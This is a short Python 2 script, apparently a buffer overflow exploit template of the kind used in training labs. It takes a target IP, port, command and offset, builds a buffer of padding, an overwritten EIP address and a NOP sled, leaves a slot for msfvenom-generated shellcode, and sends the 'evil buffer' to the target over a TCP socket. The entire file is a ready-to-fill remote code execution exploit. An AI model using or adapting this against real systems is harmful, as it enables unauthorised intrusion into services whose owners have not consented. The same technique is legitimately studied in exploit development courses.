#!/usr/bin/python
import os, sys, socket, argparse

parser = argparse.ArgumentParser()
parser.add_argument("--h", help="this is the target IP Address")
parser.add_argument("--p", type=int, help="This is the target Port Number")
parser.add_argument("--cmd", type=str, help="This is the command to be executed")
parser.add_argument("--offset", type=int, help="offset byte number as determined at previous step")
args = parser.parse_args()

RHOST = args.h
RPORT = args.p
cmd = args.cmd

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

offset = args.offset
#change this value to the vulnerable memory address we want to point eip to:
ptr_address = "\xaf\x11\x50\x62"
nops = '\x90'*32
payload =  ""
#paste in payload generated by msfvenom below :

buffer = 'A' * offset
buffer += ptr_address
buffer += nops
buffer += payload

try:
	print "\nSending evil buffer..."
	s.connect((RHOST, RPORT))
	s.send((cmd + buffer + '\n'))
	print s.recv(1024)
	print "\nDone!."
except:
	print "Could not connect"
